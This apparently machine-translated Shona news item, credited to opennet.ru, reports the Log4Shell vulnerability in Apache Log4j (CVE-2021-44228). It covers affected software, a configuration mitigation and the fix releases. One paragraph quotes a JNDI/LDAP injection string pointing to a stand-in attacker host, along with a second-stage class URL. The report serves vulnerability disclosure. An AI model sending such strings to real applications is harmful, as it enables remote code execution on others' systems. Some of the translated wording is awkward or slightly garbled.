MuApache Log4j, chimiro chakakurumbira chekuronga matanda mumashandisirwo eJava, kusazvibata kwakakomba kwaonekwa kunobvumira kodhi kodhi kuti iitwe kana kukosha kwakanyatso kurongwa mu "{jndi:URL}" kunyorerwa kulogi. Kurwiswa kwacho kunogona kuitwa paJava maapplication ayo anogadzika kukosha akagamuchirwa kubva kunze masosi, semuenzaniso, kana ichiratidza zvinonetsa maitiro mumhosho meseji.
Zvinocherechedzwa kuti anenge ese mapurojekiti anoshandisa masisitimu akadai seApache Struts, Apache Solr, Apache Druid kana Apache Flink anokanganiswa nedambudziko, kusanganisira Steam, Apple iCloud, Minecraft vatengi uye maseva. Zvinotarisirwa kuti kusadzivirirwa kunogona kukonzera kurwiswa kukuru kwezvikumbiro zvemakambani, kudzokorora nhoroondo yekusagadzikana kwakanyanya muApache Struts chimiro, icho, maererano nefungidziro yakaoma, inoshandiswa mumawebhu application ne65% yeFortune. Makambani 100. Kusanganisira kuedza kuongorora network kune vanotambura masisitimu.
Dambudziko rinowedzerwa nenyaya yekuti kushandiswa kwekushanda kwakatobudiswa, asi kugadzirisa kwemapazi akagadzikana haasati agadzirwa. CVE identifier haisati yapihwa. Iyo gadziriso inongoverengerwa mulog4j-2.15.0-rc1 bvunzo bazi. Sechishandiso chekuvharisa kusakanganiswa, zvinokurudzirwa kuseta iyo log4j2.formatMsgNoLookups parameter kuti iite chokwadi.
Dambudziko rakakonzerwa nenyaya yekuti log4j inotsigira kugadzirisa masikisi akakosha "{}" mumitsara inobuda kurogi, umo JNDI (Java Naming uye Directory Interface) mibvunzo inogona kuurayiwa. Kurwiswa kwacho kunosvika pakupfuudza tambo nekutsiva "${jndi:ldap://attacker.com/a}", pakugadzirisa iyo log4j inotumira chikumbiro cheLDAP chenzira yekirasi yeJava kune attacker.com server. . Nzira yakadzoserwa neserver yeanorwisa (semuenzaniso, http://second-stage.attacker.com/Exploit.class) icharemerwa nekuitwa mukati memaitiro azvino, izvo zvinobvumira anorwisa kuti aite zvekupokana kodhi pa system ine kodzero dzekushandisa ikozvino.
Addendum 1: Kusagadzikana kwakapihwa chiziviso CVE-2021-44228.
Addendum 2: Nzira yekunzvenga chengetedzo yakawedzerwa nekuburitsa log4j-2.15.0-rc1 yaonekwa. Iyo nyowani yekuvandudza, log4j-2.15.0-rc2, yakatsanangurwa ine dziviriro yakakwana kubva panjodzi. Iyo kodhi inosimbisa shanduko ine chekuita nekusavapo kwekumisa kusiri kujairika panyaya yekushandisa isina kurongeka JNDI URL.
Source: opennet.ru